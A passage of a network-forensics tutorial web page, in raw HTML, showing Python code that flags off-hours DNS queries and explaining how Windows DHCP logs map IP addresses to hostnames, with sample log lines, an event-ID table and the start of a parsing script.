style=\"color:hsl(139, 66%, 32%)\">'HIGH'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Detect unusual timing: queries at off-hours (midnight - 5am)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        off_hours_queries </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> qt </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> query_list</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hour </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">off_hours_queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">20</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            findings</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'client_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'indicator'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'OFF_HOURS_ACTIVITY'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'detail'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">off_hours_queries</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> queries between midnight and 5AM'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'MEDIUM'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> findings</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> __name__ </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'__main__'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    log_file </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> sys</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">argv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">1</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">sys</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">argv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">1</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">r'C:\\DNSDebugLog\\dns.log'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Parsing DNS debug log: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">log_file</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    queries </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parse_dns_debug_log</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_file</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Found </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">queries</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> unique client IPs\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    findings </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> detect_lateral_movement_patterns</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> findings</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"[+] No lateral movement indicators detected\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"\\n[!] </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">findings</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> INDICATORS DETECTED:\\n\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> f </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">findings</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  [</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">f</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">] </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">f</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'client_ip'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">f</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'indicator'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"         </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">f</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'detail'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\\n\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-3--dhcp-log-forensics-the-ip-identity-backbone\">Part 3  DHCP Log Forensics: The IP Identity Backbone<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-3--dhcp-log-forensics-the-ip-identity-backbone\" class=\"hash-link\" aria-label=\"Direct link to Part 3  DHCP Log Forensics: The IP Identity Backbone\" title=\"Direct link to Part 3  DHCP Log Forensics: The IP Identity Backbone\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"31-why-dhcp-logs-are-essential-for-network-ir\">3.1 Why DHCP Logs Are Essential for Network IR<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#31-why-dhcp-logs-are-essential-for-network-ir\" class=\"hash-link\" aria-label=\"Direct link to 3.1 Why DHCP Logs Are Essential for Network IR\" title=\"Direct link to 3.1 Why DHCP Logs Are Essential for Network IR\" translate=\"no\">​</a></h3>\n<p>In any active investigation, you will frequently encounter IP addresses in NetFlow, DNS query logs, and authentication logs with no hostname context. Without DHCP correlation, <code>10.10.5.42</code> is meaningless. With DHCP logs, <code>10.10.5.42</code> becomes <code>LAPTOP-JSMITH</code> with MAC address <code>00:1A:2B:3C:4D:5E</code>  immediately correlating to a specific user and device in your asset inventory.</p>\n<p>DHCP logs are the <strong>IP-to-identity translation layer</strong> that makes all other network forensic data actionable.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"32-windows-dhcp-server-log-format\">3.2 Windows DHCP Server Log Format<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#32-windows-dhcp-server-log-format\" class=\"hash-link\" aria-label=\"Direct link to 3.2 Windows DHCP Server Log Format\" title=\"Direct link to 3.2 Windows DHCP Server Log Format\" translate=\"no\">​</a></h3>\n<p>Windows DHCP Server maintains daily rotating log files at:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\dhcp\\DhcpSrvLog-Mon.log</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\dhcp\\DhcpSrvLog-Tue.log</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\dhcp\\DhcpSrvLog-Sun.log</span><br></span></code></pre></div></div>\n<p>Each line is CSV-formatted:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ID,Date,Time,Description,IP Address,Host Name,MAC Address,User Name,...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">10,11/15/25,02:31:04,Assign,10.10.5.42,LAPTOP-JSMITH,00-1A-2B-3C-4D-5E,,0...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">11,11/15/25,02:31:04,Renew,10.10.5.42,LAPTOP-JSMITH,00-1A-2B-3C-4D-5E,,0...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">12,11/15/25,10:44:17,Release,10.10.5.42,LAPTOP-JSMITH,00-1A-2B-3C-4D-5E,,0...</span><br></span></code></pre></div></div>\n<p><strong>Key Event IDs in DHCP logs:</strong></p>\n<table><thead><tr><th>ID</th><th>Description</th><th>Forensic Significance</th></tr></thead><tbody><tr><td>10</td><td>Assign</td><td>New lease  device appeared on network at this time</td></tr><tr><td>11</td><td>Renew</td><td>Lease renewal  device still active</td></tr><tr><td>12</td><td>Release</td><td>Client gracefully released IP  clean shutdown</td></tr><tr><td>13</td><td>DNS Update</td><td>DHCP registered DNS A record on behalf of client</td></tr><tr><td>14</td><td>DNS Update Failed</td><td>DNS dynamic update failed  may indicate DNS manipulation</td></tr><tr><td>15</td><td>Lease Expired</td><td>Client dropped off without releasing  crash, abrupt disconnect</td></tr><tr><td>24</td><td>IP Address in Use</td><td>Conflict  potentially unauthorized static IP or spoofed MAC</td></tr><tr><td>25</td><td>IP Address Deleted</td><td>Lease manually deleted by admin</td></tr><tr><td>50-59</td><td>IPv6 equivalents</td><td>Same semantics, IPv6 addresses</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"33-parsing-dhcp-logs-for-ip-to-host-correlation\">3.3 Parsing DHCP Logs for IP-to-Host Correlation<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#33-parsing-dhcp-logs-for-ip-to-host-correlation\" class=\"hash-link\" aria-label=\"Direct link to 3.3 Parsing DHCP Logs for IP-to-Host Correlation\" title=\"Direct link to 3.3 Parsing DHCP Logs for IP-to-Host Correlation\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#!/usr/bin/env python3</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Parse all Windows DHCP server log files in a directory.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Builds a time-aware IP-to-hostname mapping for correlation with</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">other forensic artifacts during incident response.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> os</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> glob</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> datetime </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> datetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> collections </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> defaultdict</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">DHCP_EVENT_TYPES </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Assign'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'11'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Renew'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'12'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 